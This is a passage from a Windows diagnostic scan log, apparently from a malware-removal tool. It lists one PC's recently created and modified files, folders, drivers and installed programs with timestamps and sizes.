- 2019-06-12 06:58 - 002355000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll 2019-06-04 19:44 - 2019-06-04 19:44 - 000711968 _____ (Realtek ) C:\WINDOWS\system32\Drivers\rt640x64.sys 2019-06-04 09:50 - 2019-07-04 13:59 - 000000000 ____D C:\Users\virk_ps\Desktop\RTL_Assignment 2019-05-22 21:07 - 2019-05-30 21:08 - 000000000 ____D C:\WINDOWS\AutoKMS 2019-05-22 20:03 - 2019-05-30 13:16 - 000000000 ____D C:\Program Files (x86)\Microsoft Toolkit Final 2019-05-16 13:24 - 2019-05-22 19:56 - 000000000 ___RD C:\Users\virk_ps\Creative Cloud Files 2019-05-16 13:23 - 2019-05-16 13:23 - 000000000 ____D C:\Users\virk_ps\Documents\Adobe 2019-05-11 06:14 - 2019-05-11 06:14 - 000083776 _____ (Insecure.Com LLC.) C:\WINDOWS\system32\Drivers\npcap.sys 2019-05-08 11:29 - 2019-05-08 10:06 - 000110968 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-64.dll 2019-04-23 11:05 - 2019-04-23 11:05 - 000117808 _____ (McAfee, LLC) C:\WINDOWS\system32\Drivers\SET3AE7.tmp 2019-04-23 01:03 - 2019-04-23 01:03 - 000109096 _____ (McAfee LLC.) C:\WINDOWS\system32\Drivers\mfencrk.sys 2019-04-23 01:03 - 2019-04-23 01:03 - 000031792 _____ (McAfee LLC.) C:\WINDOWS\system32\Drivers\mfeclnrk.sys 2019-04-21 18:39 - 2019-04-21 18:39 - 000001075 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arduino.lnk 2019-04-21 18:39 - 2019-04-21 18:39 - 000001063 _____ C:\Users\Public\Desktop\Arduino.lnk 2019-04-21 15:57 - 2019-04-21 15:57 - 000003120 _____ C:\WINDOWS\SysWOW64\XD5OC2SD.ocx 2019-04-20 21:41 - 2019-07-03 15:26 - 000130748 ____H C:\Users\virk_ps\AppData\Local\IconCache.db.backup 2019-04-19 22:48 - 2019-07-04 19:12 - 000000000 ____H C:\$WINRE_BACKUP_PARTITION.MARKER 2019-04-11 15:25 - 2019-07-04 19:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SD Association 2019-04-11 14:59 - 2019-04-11 14:59 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\PowerISO 2019-04-11 14:58 - 2017-06-07 06:06 - 000138296 _____ (Power Software Ltd) C:\WINDOWS\system32\Drivers\scdemu.sys 2019-04-11 03:35 - 2019-07-04 20:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiniTool Power Data Recovery 7.0 2019-04-11 03:35 - 2019-04-11 03:38 - 000000000 ____D C:\Program Files\PowerDataRecovery 2019-04-11 03:35 - 2019-04-11 03:35 - 000000968 _____ C:\Users\Public\Desktop\MiniTool Power Data Recovery 7.0.lnk 2019-04-11 01:48 - 2019-04-11 03:35 - 000000000 ____D C:\Program Files\MiniToolPowerDataRecovery 2019-04-10 23:35 - 2019-04-11 15:25 - 000002667 _____ C:\Users\Public\Desktop\SD Card Formatter.lnk 2019-04-08 21:17 - 2019-04-08 21:18 - 000007605 _____ C:\Users\virk_ps\AppData\Local\Resmon.ResmonCfg 2019-04-07 16:10 - 2019-06-14 07:23 - 000001047 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 14.lnk 2019-04-07 16:10 - 2019-06-14 07:23 - 000001035 _____ C:\Users\Public\Desktop\TeamViewer 14.lnk ==================== Three months (modified) ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-07-04 23:43 - 2019-03-19 10:22 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2019-07-04 22:10 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\AppReadiness 2019-07-04 22:08 - 2018-10-02 08:51 - 000000000 ____D C:\ProgramData\Xilinx 2019-07-04 22:06 - 2019-03-19 10:20 - 000000000 ____D C:\WINDOWS\INF 2019-07-04 22:05 - 2017-07-26 22:27 - 000000000 __SHD C:\Users\virk_ps\IntelGraphicsProfiles 2019-07-04 22:03 - 2018-01-23 19:59 - 000007992 __RSH C:\ProgramData\ntuser.pol 2019-07-04 22:02 - 2018-05-01 22:43 - 000000000 ____D C:\Program Files (x86)\TeamViewer 2019-07-04 22:00 - 2019-03-19 10:07 - 000524288 _____ C:\WINDOWS\system32\config\BBI 2019-07-04 21:58 - 2017-07-27 01:07 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WhatsApp 2019-07-04 21:50 - 2017-10-31 23:54 - 000000000 ____D C:\Users\virk_ps\AppData\Local\Packages 2019-07-04 21:45 - 2019-03-19 10:07 - 000000000 ____D C:\WINDOWS\CbsTemp 2019-07-04 21:27 - 2017-07-27 01:07 - 000000000 ____D C:\Users\virk_ps\AppData\Local\SquirrelTemp 2019-07-04 21:26 - 2019-03-19 10:22 - 000000000 ___RD C:\WINDOWS\PrintDialog 2019-07-04 21:13 - 2019-03-19 10:22 - 000000000 ____D C:\ProgramData\USOPrivate 2019-07-04 21:08 - 2017-11-01 16:29 - 000000000 ___RD C:\Users\virk_ps\3D Objects 2019-07-04 21:08 - 2017-07-26 21:45 - 000000000 __RHD C:\Users\Public\AccountPictures 2019-07-04 21:07 - 2017-07-26 22:26 - 000000451 _____ C:\WINDOWS\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat 2019-07-04 21:02 - 2019-03-19 10:22 - 000000000 ___HD C:\Program Files\WindowsApps 2019-07-04 20:50 - 2019-03-19 10:22 - 000000000 ___HD C:\WINDOWS\ELAMBKUP 2019-07-04 20:39 - 2017-07-26 22:11 - 000000000 ____D C:\WINDOWS\SysWOW64\RTCOM 2019-07-04 20:38 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\appcompat 2019-07-04 20:38 - 2017-10-31 23:51 - 000000000 ____D C:\WINDOWS\SysWOW64\sda 2019-07-04 20:33 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\WinBioDatabase 2019-07-04 20:33 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\Registration 2019-07-04 20:33 - 2019-03-19 10:19 - 000028672 _____ C:\WINDOWS\system32\config\BCD-Template 2019-07-04 20:33 - 2018-09-15 13:03 - 000000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2019-07-04 20:32 - 2019-04-01 16:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EndNote 2019-07-04 20:32 - 2019-03-19 17:12 - 000000000 ____D C:\WINDOWS\SysWOW64\MailContactsCalendarSync 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\SysWOW64\IME 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\spool 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\oobe 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\NDF 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\Macromed 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\InputMethod 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\ServiceState 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\LiveKernelReports 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\InputMethod 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\Program Files\Common Files\System 2019-07-04 20:32 - 2019-03-19 10:22 - 000000000 ____D C:\Program Files\Common Files\microsoft shared 2019-07-04 20:32 - 2018-10-09 22:52 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SQLite ODBC Driver for Win64 2019-07-04 20:32 - 2018-10-09 22:20 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cadence 2019-07-04 20:32 - 2018-10-09 22:18 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cadence Release 17.2-2016 2019-07-04 20:32 - 2018-10-03 01:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Xilinx Design Tools 2019-07-04 20:32 - 2018-09-15 13:03 - 000000000 ____D C:\WINDOWS\system32\MsDtc 2019-07-04 20:32 - 2018-05-14 19:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RealVNC 2019-07-04 20:32 - 2018-05-14 19:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PuTTY (64-bit) 2019-07-04 20:32 - 2018-05-10 01:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7 2019-07-04 20:32 - 2018-04-30 17:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LLVM 2019-07-04 20:32 - 2018-04-16 19:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Texas Instruments 2019-07-04 20:32 - 2018-04-12 02:34 - 000000000 ____D C:\WINDOWS\SysWOW64\kn-IN 2019-07-04 20:32 - 2018-04-12 02:34 - 000000000 ____D C:\WINDOWS\SysWOW64\bn-BD 2019-07-04 20:32 - 2018-04-12 02:34 - 000000000 ____D C:\WINDOWS\SysWOW64\af-ZA 2019-07-04 20:32 - 2018-03-09 01:01 - 000000000 ____D C:\WINDOWS\SysWOW64\Hotspot Shield 2019-07-04 20:32 - 2018-02-17 20:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tina 9 - TI 2019-07-04 20:32 - 2018-02-17 20:08 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Python 3.6 2019-07-04 20:32 - 2018-02-10 23:04 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anaconda3 (64-bit) 2019-07-04 20:32 - 2018-01-26 01:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap 2019-07-04 20:32 - 2018-01-23 22:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Partition Master 12.8 2019-07-04 20:32 - 2018-01-12 20:01 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JetBrains Toolbox 2019-07-04 20:32 - 2018-01-11 00:50 - 000000000 ____D C:\WINDOWS\SysWOW64\1033 2019-07-04 20:32 - 2018-01-11 00:50 - 000000000 ____D C:\WINDOWS\system32\1033 2019-07-04 20:32 - 2018-01-11 00:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008 R2 2019-07-04 20:32 - 2018-01-10 22:15 - 000000000 ____D C:\WINDOWS\SysWOW64\cvirte 2019-07-04 20:32 - 2018-01-10 22:15 - 000000000 ____D C:\WINDOWS\system32\cvirte 2019-07-04 20:32 - 2018-01-10 22:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\National Instruments 2019-07-04 20:32 - 2017-12-26 00:13 - 000000000 ____D C:\WINDOWS\system32\appmgmt 2019-07-04 20:32 - 2017-12-26 00:00 - 000000000 ____D C:\ProgramData\regid.1986-12.com.adobe 2019-07-04 20:32 - 2017-11-27 02:05 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GitHub, Inc 2019-07-04 20:32 - 2017-11-27 01:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++ 2019-07-04 20:32 - 2017-11-27 00:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Proteus 8 Professional 2019-07-04 20:32 - 2017-08-20 19:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Orcad Family Release 9.2 Lite Edition 2019-07-04 20:32 - 2017-07-27 13:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MATLAB R2016a 2019-07-04 20:32 - 2017-07-27 10:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2019-07-04 20:32 - 2017-07-27 08:37 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools 2019-07-04 20:32 - 2017-07-27 08:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip 2019-07-04 20:32 - 2017-07-27 02:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2019-07-04 20:32 - 2017-07-27 02:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MySQL 2019-07-04 20:32 - 2017-07-27 02:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinDjView 2019-07-04 20:32 - 2017-07-27 01:28 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CodeBlocks 2019-07-04 20:32 - 2017-07-27 01:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks 2019-07-04 20:32 - 2017-07-27 01:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\emu8086 2019-07-04 20:32 - 2017-07-27 00:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN 2019-07-04 20:32 - 2017-07-26 23:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee 2019-07-04 20:32 - 2017-07-26 22:11 - 000000000 ____D C:\WINDOWS\system32\SRSLabs 2019-07-04 20:32 - 2014-11-22 10:46 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embedded Lockdown Manager 2019-07-04 20:32 - 2014-11-22 06:15 - 000000000 ____D C:\WINDOWS\ShellNew 2019-07-04 20:32 - 2013-08-22 21:06 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy 2019-07-04 20:32 - 2013-08-22 21:06 - 000000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared 2019-07-04 20:32 - 2013-08-22 21:06 - 000000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared 2019-07-04 20:27 - 2019-03-19 10:26 - 000000000 ____D C:\WINDOWS\Setup 2019-07-04 20:15 - 2019-03-19 10:22 - 000000000 __RHD C:\Users\Public\Libraries 2019-07-04 20:14 - 2019-03-19 10:07 - 000008192 _____ C:\WINDOWS\system32\config\ELAM 2019-07-04 19:44 - 2019-03-19 17:10 - 000000000 ____D C:\WINDOWS\SysWOW64\slmgr 2019-07-04 19:44 - 2019-03-19 17:10 - 000000000 ____D C:\WINDOWS\system32\slmgr 2019-07-04 19:44 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\SysWOW64\lv-LV 2019-07-04 19:44 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT 2019-07-04 19:44 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\SysWOW64\et-EE 2019-07-04 19:44 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\lv-LV 2019-07-04 19:44 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\lt-LT 2019-07-04 19:44 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\et-EE 2019-07-04 19:39 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\Resources 2019-07-04 19:39 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\Help 2019-07-04 19:39 - 2018-10-09 23:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cadence Release 17.2-2016 2019-07-04 19:39 - 2018-10-09 22:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cadence 2019-07-04 19:39 - 2018-03-04 23:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GNU Octave 3.2.4 2019-07-04 19:39 - 2018-01-11 00:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008 2019-07-04 19:39 - 2017-07-27 11:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\JKI 2019-07-04 19:39 - 2017-07-27 10:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Silvaco 2019-07-04 19:38 - 2017-07-26 21:28 - 000000000 ____D C:\Program Files\Synaptics 2019-07-04 19:38 - 2017-07-26 15:28 - 000000000 ____D C:\Program Files\Intel 2019-07-04 19:37 - 2018-10-02 15:20 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Digilent 2019-07-04 19:33 - 2019-03-19 17:13 - 000000000 ___SD C:\WINDOWS\system32\AppV 2019-07-04 19:33 - 2019-03-19 17:13 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection 2019-07-04 19:33 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\SystemResources 2019-07-04 19:33 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\migwiz 2019-07-04 19:33 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\appraiser 2019-07-04 19:33 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\ShellExperiences 2019-07-04 19:33 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\bcastdvr 2019-07-04 19:19 - 2019-03-19 10:28 - 000444928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2019-07-04 19:19 - 2019-03-19 10:28 - 000304640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys 2019-07-04 19:19 - 2019-03-19 10:27 - 000134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser.dll 2019-07-04 19:17 - 2019-03-19 17:11 - 000000000 ____D C:\WINDOWS\system32\OpenSSH 2019-07-04 19:17 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\SysWOW64\es-MX 2019-07-04 19:17 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\SystemApps 2019-07-04 19:17 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\system32\es-MX 2019-07-04 14:04 - 2018-10-02 23:13 - 000001103 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++.lnk 2019-07-04 14:04 - 2017-07-27 01:38 - 000001091 _____ C:\Users\Public\Desktop\Notepad++.lnk 2019-07-04 07:11 - 2017-07-27 01:10 - 000000000 ____D C:\Windows10Upgrade 2019-07-04 06:47 - 2017-07-27 01:10 - 000000738 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 10 Update Assistant.lnk 2019-07-04 06:47 - 2017-07-27 01:10 - 000000726 _____ C:\Users\virk_ps\Desktop\Windows 10 Update Assistant.lnk 2019-07-04 00:14 - 2017-09-22 19:48 - 000000000 ____D C:\Users\virk_ps\AppData\Local\ElevatedDiagnostics 2019-07-04 00:08 - 2018-01-12 23:01 - 000000000 ___RD C:\Users\virk_ps\Desktop\OneDrive - pec.edu.in 2019-07-03 17:06 - 2018-04-06 22:20 - 000000000 ____D C:\Program Files\Google 2019-07-03 15:31 - 2018-04-06 23:16 - 000001858 _____ C:\Users\virk_ps\Desktop\Google Drive.lnk 2019-07-03 13:43 - 2017-11-14 16:03 - 000000000 ____D C:\Users\virk_ps\Downloads\PRINTABLE FINAL 2019-07-03 13:25 - 2017-07-27 01:16 - 000000000 ____D C:\Users\virk_ps\Downloads\SETUPS 2019-07-03 11:28 - 2019-02-28 20:27 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Spotify 2019-07-02 11:08 - 2018-05-18 22:01 - 000000000 ____D C:\Users\virk_ps\AppData\Local\D3DSCache 2019-07-01 16:51 - 2019-02-28 20:31 - 000000000 ____D C:\Users\virk_ps\AppData\Local\Spotify 2019-07-01 14:50 - 2018-10-02 08:51 - 000000000 ____D C:\Users\virk_ps\.oracle_jre_usage 2019-06-28 17:46 - 2018-10-09 23:21 - 004988208 _____ (SafeNet Inc.) C:\WINDOWS\system32\haspsrm_win64.dll 2019-06-28 17:46 - 2018-10-09 23:21 - 004430128 _____ (SafeNet Inc.) C:\WINDOWS\SysWOW64\haspsrm_win32.dll 2019-06-27 17:04 - 2018-10-09 22:15 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\SPB_Data 2019-06-25 10:16 - 2019-01-22 11:54 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Digilent 2019-06-24 22:57 - 2018-10-02 14:46 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Xilinx 2019-06-24 21:03 - 2018-10-04 08:25 - 000000000 ____D C:\.Xilinx 2019-06-24 20:28 - 2018-01-26 01:57 - 000000000 ____D C:\Program Files (x86)\WinPcap 2019-06-24 20:26 - 2018-10-02 15:20 - 000000000 ____D C:\Program Files (x86)\Digilent 2019-06-24 20:25 - 2017-07-26 23:49 - 000000000 ____D C:\ProgramData\Package Cache 2019-06-24 18:10 - 2018-12-03 00:40 - 000000000 ____D C:\ProgramData\Packages 2019-06-20 17:02 - 2017-07-27 01:29 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\CodeBlocks 2019-06-20 17:02 - 2017-07-26 11:57 - 000000000 ____D C:\Users\virk_ps\AppData\Local\VirtualStore 2019-06-20 16:57 - 2018-10-10 00:28 - 000000000 ____D C:\Users\virk_ps\Documents\CADENCE 2019-06-20 16:52 - 2018-01-26 01:21 - 000000000 ____D C:\Program Files\Wireshark 2019-06-20 16:39 - 2017-07-27 01:50 - 000000000 ____D C:\Users\virk_ps\AppData\Local\Lenovo 2019-06-20 16:39 - 2017-07-27 01:50 - 000000000 ____D C:\ProgramData\Lenovo 2019-06-20 16:28 - 2018-02-10 22:55 - 000000000 ____D C:\Users\virk_ps\Anaconda3 2019-06-20 16:20 - 2018-01-26 17:15 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Wireshark 2019-06-20 15:56 - 2018-02-14 00:59 - 000000000 ____D C:\MinGW 2019-06-20 15:47 - 2018-04-30 17:00 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Atom 2019-06-20 15:47 - 2018-04-30 16:58 - 000000000 ____D C:\Users\virk_ps\AppData\Local\atom 2019-06-20 15:14 - 2018-03-25 21:49 - 000004121 _____ C:\Users\virk_ps\AppData\Roaming\LTspiceXVII.ini 2019-06-19 17:07 - 2017-07-27 11:47 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2019-06-19 16:41 - 2018-05-01 02:31 - 000000000 ____D C:\Program Files (x86)\SDA 2019-06-19 15:10 - 2017-07-27 00:44 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\vlc 2019-06-17 11:39 - 2017-07-27 01:39 - 000000000 ____D C:\Users\virk_ps\AppData\Roaming\Notepad++ 2019-06-17 11:39 - 2017-07-27 01:38 - 000000000 ____D C:\Program Files (x86)\Notepad++ 2019-06-16 12:24 - 2017-07-26 21:48 - 000000000 ___RD C:\Users\virk_ps\OneDrive 2019-06-16 10:26 - 2018-04-06 23:16 - 000000000 ___RD C:\Users\virk_ps\Google Drive 2019-06-14 06:32 - 2018-12-08 17:22 - 000000000 ____D C:\Program Files (x86)\McAfee 2019-06-14 06:29 - 2018-10-09 22:03 - 000000226 _____ C:\WINDOWS\pxisys.ni.bak 2019-06-14 06:29 - 2018-10-09 22:03 - 000000217 _____ C:\WINDOWS\pxiesys.ni.bak 2019-06-12 10:11 - 2017-07-26 22:57 - 000000000 ____D C:\WINDOWS\system32\MRT 2019-06-12 09:56 - 2017-07-26 22:56 - 135349160 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2019-06-12 07:03 - 2019-03-19 10:26 - 000835688 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2019-06-12 07:03 - 2019-03-19 10:26 - 000179816 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2019-06-12 07:03 - 2019-03-19 10:22 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs 2019-06-12 07:03 - 2019-03-19 10:22 - 000000000 ____D C:\WINDOWS\ShellComponents 2019-06-06 09:37 - 2013-08-22 18:55 - 000000210 _____ C:\WINDOWS\win.ini 2019-06-04 12:16 - 2018-12-08 17:14 - 000000000 ____D C:\Program Files\Common Files\McAfee ==================== Files in the root of some directories ================ 2019-06-24 21:54 - 2019-07-04 23:01 - 000000004 _____ () C:\ProgramData\lock.dat 2019-06-24 21:54 - 2019-06-24 21:54 - 000000008 _____ () C:\ProgramData\ts.dat 2014-09-20 21:29 - 2014-09-20 21:29 - 000070656 _____ (Christian Werner Software & Consulting) C:\Program Files\adddsn.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000070656 _____ (Christian Werner Software & Consulting) C:\Program Files\addsysdsn.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000073216 _____ (Christian Werner Software & Consulting) C:\Program Files\inst.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000073216 _____ (Christian Werner Software & Consulting) C:\Program Files\instq.exe 2004-11-13 11:42 - 2004-11-13 11:42 - 000001456 _____ () C:\Program Files\license.terms 2014-09-20 21:30 - 2014-09-20 21:30 - 000001482 _____ () C:\Program Files\license.txt 2014-09-20 21:04 - 2014-09-20 21:04 - 000011410 _____ () C:\Program Files\README 2014-09-20 21:04 - 2014-09-20 21:04 - 000011410 _____ () C:\Program Files\readme.txt 2014-09-20 21:29 - 2014-09-20 21:29 - 000070656 _____ (Christian Werner Software & Consulting) C:\Program Files\remdsn.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000070656 _____ (Christian Werner Software & Consulting) C:\Program Files\remsysdsn.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000067584 _____ () C:\Program Files\sqlite3.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000858624 _____ (Christian Werner Software & Consulting) C:\Program Files\sqlite3odbc.dll 2014-09-20 21:30 - 2014-09-20 21:30 - 000852992 _____ (Christian Werner Software & Consulting) C:\Program Files\sqlite3odbcnw.dll 2014-09-20 21:29 - 2014-09-20 21:29 - 000078848 _____ (Christian Werner Software & Consulting) C:\Program Files\sqlite3_mod_blobtoxy.dll 2014-09-20 21:29 - 2014-09-20 21:29 - 000062464 _____ () C:\Program Files\sqlite3_mod_csvtable.dll 2014-09-20 21:30 - 2014-09-20 21:30 - 000059904 _____ () C:\Program Files\sqlite3_mod_extfunc.dll 2014-09-20 21:30 - 2014-09-20 21:30 - 000150528 _____ () C:\Program Files\sqlite3_mod_fts3.dll 2014-09-20 21:29 - 2014-09-20 21:29 - 000057344 _____ () C:\Program Files\sqlite3_mod_impexp.dll 2014-09-20 21:30 - 2014-09-20 21:30 - 000062464 _____ () C:\Program Files\sqlite3_mod_rtree.dll 2014-09-20 21:29 - 2014-09-20 21:29 - 000101376 _____ () C:\Program Files\sqlite3_mod_zipfile.dll 2014-09-20 21:29 - 2014-09-20 21:29 - 000073216 _____ (Christian Werner Software & Consulting) C:\Program Files\uninst.exe 2018-10-09 22:52 - 2018-10-09 22:52 - 000063202 _____ () C:\Program Files\Uninstall.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000073216 _____ (Christian Werner Software & Consulting) C:\Program Files\uninstq.exe 2018-03-25 21:49 - 2019-06-20 15:14 - 000004121 _____ () C:\Users\virk_ps\AppData\Roaming\LTspiceXVII.ini 2017-12-25 23:30 - 2018-02-02 06:00 - 000000052 _____ () C:\Users\virk_ps\AppData\Local\knqtwz2222 2018-10-01 22:20 - 2018-10-01 22:20 - 000000000 _____ () C:\Users\virk_ps\AppData\Local\oobelibMkey.log 2018-05-14 19:48 - 2018-05-20 16:21 - 000000600 _____ () C:\Users\virk_ps\AppData\Local\PUTTY.RND 2019-04-08 21:17 - 2019-04-08 21:18 - 000007605 _____ () C:\Users\virk_ps\AppData\Local\Resmon.ResmonCfg 2019-01-28 15:45 - 2019-01-28 15:45 - 000000000 _____ () C:\Users\virk_ps\AppData\Local\{6ADA99AA-9EE0-4201-B581-AE5053F18322} ==================== SigCheckExt ================ 2014-09-20 21:29 - 2014-09-20 21:29 - 000070656 _____ (Christian Werner Software & Consulting) C:\Program Files\adddsn.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000070656 _____ (Christian Werner Software & Consulting) C:\Program Files\addsysdsn.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000073216 _____ (Christian Werner Software & Consulting) C:\Program Files\inst.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000073216 _____ (Christian Werner Software & Consulting) C:\Program Files\instq.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000070656 _____ (Christian Werner Software & Consulting) C:\Program Files\remdsn.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000070656 _____ (Christian Werner Software & Consulting) C:\Program Files\remsysdsn.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000067584 _____ C:\Program Files\sqlite3.exe 2014-09-20 21:29 - 2014-09-20 21:29 - 000858624 _____ (Christian Werner Software & Consulting) C:\Program Files\sqlite3odbc.dll 2014-09-20 21:30 - 2014-09-20 21:30 - 000852992 _____ (Christian Werner Software & 